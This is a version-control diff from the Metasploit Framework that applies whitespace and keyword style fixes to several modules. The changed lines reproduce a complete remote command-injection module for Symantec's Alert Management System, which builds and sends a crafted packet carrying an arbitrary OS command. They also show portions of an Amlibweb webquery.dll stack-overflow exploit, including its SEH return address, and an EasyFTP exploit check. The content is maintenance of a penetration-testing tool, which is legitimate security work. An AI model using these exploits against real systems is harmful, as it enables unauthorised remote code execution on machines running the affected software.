style compliance fixes

git-svn-id: file:///home/svn/framework3/trunk@9953 4d416f70-5f16-0410-b530-b9f4589650da

modules/auxiliary/admin/symantec/ams_hndlrsvc.rb

@@ -1,5 +1,5 @@
 ##
-# $Id: ams_hndlrsvc.rb 9179 2010-04-30 08:40:19Z mc $
+# $Id$
 ##
 
 ##
@@ -22,11 +22,11 @@ class Metasploit3 < Msf::Auxiliary
 			'Name'           => 'Symantec System Center Alert Management System (hndlrsvc.exe) Arbitrary Command Execution',
 			'Description'    => %q{
 					Symantec System Center Alert Management System is prone to a remote command-injection vulnerability
-					because the application fails to properly sanitize user-supplied input.
+				because the application fails to properly sanitize user-supplied input.
 			},
 			'Author'         => [ 'MC' ],
 			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision: $',
+			'Version'        => '$Revision$',
 			'References'     =>
 				[
 					[ 'OSVDB', '66807'],
@@ -35,101 +35,102 @@ class Metasploit3 < Msf::Auxiliary
 				],
 			'DisclosureDate' => 'Jul 26 2010'))
 
-			register_options(
-				[
-					Opt::RPORT(38292),
-					OptString.new('CMD', [ false, 'The OS command to execute', 'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),
-				], self.class)
+		register_options(
+			[
+				Opt::RPORT(38292),
+				OptString.new('CMD', [ false, 'The OS command to execute',
+					'cmd.exe /c echo metasploit > %SYSTEMDRIVE%\\metasploit.txt']),
+			], self.class)
 	end
 
 	def run
 		begin
 			connect
 
-				cmd = datastore['CMD']
+			cmd = datastore['CMD']
 
-				if ( cmd.length > 128 )
-					raise RuntimeError,"Command strings greater then 128 characters will not be processed!"
-				end
+			if ( cmd.length > 128 )
+				raise RuntimeError,"Command strings greater then 128 characters will not be processed!"
+			end
 
-				string_uno  = Rex::Text.rand_text_alpha_upper(11)
-				string_dos  = Rex::Text.rand_text_alpha_upper(rand(4) + 5)
+			string_uno  = Rex::Text.rand_text_alpha_upper(11)
+			string_dos  = Rex::Text.rand_text_alpha_upper(rand(4) + 5)
 
-				packet =  "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"
-				packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00"
-				packet << "\xe8\x03\x00\x00"
-				packet << 'PRGXCNFG'
-				packet << "\x10\x00\x00\x00"
-				packet << "\x00\x00\x00\x00\x04"
-				packet << 'ALHD\F'
-				packet << "\x00\x00\x01\x00\x00"
-				packet << "\x00\x01\x00\x0e\x00"
-				packet << 'Risk Repaired'
-				packet << "\x00\x25\x00"
-				packet << 'Symantec Antivirus Corporate Edition'
-				packet << "\x00\xf9\x1d\x13\x4a\x3f"
-				packet << [string_uno.length + 1].pack('v') + string_uno 
-				packet << "\x00\x08\x08\x0a"
-				packet << "\x00" + 'Risk Name' 
-				packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-				packet << "\x00" + string_dos 
-				packet << "\x00\x08\x0a\x00"
-				packet << 'File Path'
-				packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-				packet << "\x00" + string_dos
-				packet << "\x00\x08\x11\x00"
-				packet << 'Requested Action'
-				packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-				packet << "\x00" + string_dos 
-				packet << "\x00\x08\x0e\x00"
-				packet << 'Actual Action'
-				packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-				packet << "\x00" + string_dos
-				packet << "\x00\x08\x07\x00"
-				packet << 'Logger'
-				packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-				packet << "\x00" + string_dos 
-				packet << "\x00\x08\x05\x00"
-				packet << 'User'
-				packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-				packet << "\x00" + string_dos
-				packet << "\x00\x08\x09\x00"
-				packet << 'Hostname'
-				packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno
-				packet << "\x00\x08\x13\x00"
-				packet << 'Corrective Actions'
-				packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-				packet << "\x00" + string_dos
-				packet << "\x00\x00\x07\x08\x12\x00"
-				packet << 'ConfigurationName'
-				packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
-				packet << "\x00" + cmd
-				packet << "\x00\x08\x0c\x00"
-				packet << 'CommandLine'
-				packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
-				packet << "\x00" + cmd
-				packet << "\x00\x08\x08\x00"
-				packet << 'RunArgs'
-				packet << "\x00\x04\x00\x02\x00"
-				packet << "\x20\x00\x03\x05\x00"
-				packet << 'Mode'
-				packet << "\x00\x04\x00\x02\x00\x00\x00"
-				packet << "\x0a\x0d\x00"
-				packet << 'FormatString'
-				packet << "\x00\x02\x00\x00\x00\x08\x12\x00"
-				packet << 'ConfigurationName'
-				packet << "\x00\x02\x00\x00\x00\x08\x0c\x00"
-				packet << 'HandlerHost'
-				packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
-				packet << "\x00" + string_dos
-				packet << "\x00" * packet.length
+			packet =  "\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"
+			packet << "\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00"
+			packet << "\xe8\x03\x00\x00"
+			packet << 'PRGXCNFG'
+			packet << "\x10\x00\x00\x00"
+			packet << "\x00\x00\x00\x00\x04"
+			packet << 'ALHD\F'
+			packet << "\x00\x00\x01\x00\x00"
+			packet << "\x00\x01\x00\x0e\x00"
+			packet << 'Risk Repaired'
+			packet << "\x00\x25\x00"
+			packet << 'Symantec Antivirus Corporate Edition'
+			packet << "\x00\xf9\x1d\x13\x4a\x3f"
+			packet << [string_uno.length + 1].pack('v') + string_uno
+			packet << "\x00\x08\x08\x0a"
+			packet << "\x00" + 'Risk Name'
+			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+			packet << "\x00" + string_dos
+			packet << "\x00\x08\x0a\x00"
+			packet << 'File Path'
+			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+			packet << "\x00" + string_dos
+			packet << "\x00\x08\x11\x00"
+			packet << 'Requested Action'
+			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+			packet << "\x00" + string_dos
+			packet << "\x00\x08\x0e\x00"
+			packet << 'Actual Action'
+			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+			packet << "\x00" + string_dos
+			packet << "\x00\x08\x07\x00"
+			packet << 'Logger'
+			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+			packet << "\x00" + string_dos
+			packet << "\x00\x08\x05\x00"
+			packet << 'User'
+			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+			packet << "\x00" + string_dos
+			packet << "\x00\x08\x09\x00"
+			packet << 'Hostname'
+			packet << "\x00\x0e\x00" + [string_uno.length + 1].pack('v') + string_uno
+			packet << "\x00\x08\x13\x00"
+			packet << 'Corrective Actions'
+			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+			packet << "\x00" + string_dos
+			packet << "\x00\x00\x07\x08\x12\x00"
+			packet << 'ConfigurationName'
+			packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
+			packet << "\x00" + cmd
+			packet << "\x00\x08\x0c\x00"
+			packet << 'CommandLine'
+			packet << [cmd.length + 3].pack('n') + [cmd.length + 1].pack('n')
+			packet << "\x00" + cmd
+			packet << "\x00\x08\x08\x00"
+			packet << 'RunArgs'
+			packet << "\x00\x04\x00\x02\x00"
+			packet << "\x20\x00\x03\x05\x00"
+			packet << 'Mode'
+			packet << "\x00\x04\x00\x02\x00\x00\x00"
+			packet << "\x0a\x0d\x00"
+			packet << 'FormatString'
+			packet << "\x00\x02\x00\x00\x00\x08\x12\x00"
+			packet << 'ConfigurationName'
+			packet << "\x00\x02\x00\x00\x00\x08\x0c\x00"
+			packet << 'HandlerHost'
+			packet << [string_dos.length + 3].pack('n') + [string_dos.length + 1].pack('n')
+			packet << "\x00" + string_dos
+			packet << "\x00" * packet.length
 
-				print_status("Sending command: #{datastore['CMD']}")
-				sock.put(packet)
+			print_status("Sending command: #{datastore['CMD']}")
+			sock.put(packet)
 
-				disconnect
+			disconnect
 		rescue ::Exception
-		print_error("Error: #{$!.class} #{$!}")
+			print_error("Error: #{$!.class} #{$!}")
 		end
 	end
 end

modules/auxiliary/admin/symantec/ams_xfr.rb

@@ -1,5 +1,5 @@
 ##
-# $Id: ams_xfr.rb 9179 2010-04-30 08:40:19Z jduck $
+# $Id$
 ##
 
 ##
@@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary
 			},
 			'Author'         => [ 'MC' ],
 			'License'        => MSF_LICENSE,
-			'Version'        => '$Revision: 9179 $',
+			'Version'        => '$Revision$',
 			'References'     =>
 				[
 					[ 'CVE', '2009-1429' ],

modules/exploits/windows/ftp/easyftp_list_fixret.rb

@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		if (banner =~ /BigFoolCat/)
 			return Exploit::CheckCode::Vulnerable
 		end
-			return Exploit::CheckCode::Safe
+		Exploit::CheckCode::Safe
 	end
 
 	def exploit

modules/exploits/windows/http/amlibweb_webquerydll_app.rb

@@ -20,30 +20,30 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			'Name'		=> 'Amlibweb NetOpacs webquery.dll Stack Overflow',
-			'Description'	=> %q{
-			This module exploits a stack overflow in Amlib's Amlibweb
-			Library Management System (NetOpacs). The webquery.dll
-			API is available through IIS requests. By specifying
-			an overly long string to the 'app' parameter, SeH can be
-			reliably overwritten allowing for arbitrary remote code execution.
-			In addition, it is possible to overwrite EIP by specifying
-			an arbitrary parameter name with an '=' terminator.
+			'Name'         => 'Amlibweb NetOpacs webquery.dll Stack Overflow',
+			'Description'  => %q{
+					This module exploits a stack overflow in Amlib's Amlibweb
+				Library Management System (NetOpacs). The webquery.dll
+				API is available through IIS requests. By specifying
+				an overly long string to the 'app' parameter, SeH can be
+				reliably overwritten allowing for arbitrary remote code execution.
+				In addition, it is possible to overwrite EIP by specifying
+				an arbitrary parameter name with an '=' terminator.
 			},
-			'Author' 	=> [ 'patrick' ],
-			'Arch'		=> [ ARCH_X86 ],
-			'License'       => MSF_LICENSE,
-			'Version'       => '$Revision$',
-			'References'    =>
-			[
-				[ 'OSVDB', '66814'],
-				[ 'URL', 'http://www.aushack.com/advisories/' ],
-			],
+			'Author'       => [ 'patrick' ],
+			'Arch'         => [ ARCH_X86 ],
+			'License'      => MSF_LICENSE,
+			'Version'      => '$Revision$',
+			'References'   =>
+				[
+					[ 'OSVDB', '66814'],
+					[ 'URL', 'http://www.aushack.com/advisories/' ],
+				],
 			'Privileged'		=> true,
 			'DefaultOptions'	=>
-			{
-				'EXITFUNC'	=> 'thread',
-			},
+				{
+					'EXITFUNC'	=> 'thread',
+				},
 			'Payload'		=>
 				{
 					'Space'			=> 600,
@@ -54,15 +54,15 @@ class Metasploit3 < Msf::Exploit::Remote
 				},
 			'Platform' => ['win'],
 			'Targets'  =>
-			[
-				# patrickw - Tested OK 20100803 w2k IIS5 
-				[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5
-				# [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only.
-			],
+				[
+					# patrickw - Tested OK 20100803 w2k IIS5
+					[ 'Windows 2000 Pro All - English', { 'Ret' => 0x75022ac4 } ], # p/p/r ws2help.dll - 'dll?app={buff}' for SeH IIS5
+					# [ 'Windows 2003 Server All - English', { 'Ret' => 0x44434241 } ], # todo: 'dll?{buff}=' call edi for EIP in IIS6 w3wp.exe, 120 byte limit, ASCII only.
+				],
 			'DisclosureDate' => 'Aug 03 2010', #0day
 			'DefaultTarget' => 0))
 
-			register_options(
+		register_options(
 			[
 				Opt::RPORT(80),
 			],self.class)
@@ -82,7 +82,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				return Exploit::CheckCode::Vulnerable
 			end
 		end
-			return Exploit::CheckCode::Safe
+		Exploit::CheckCode::Safe
 	end
 
 	def exploit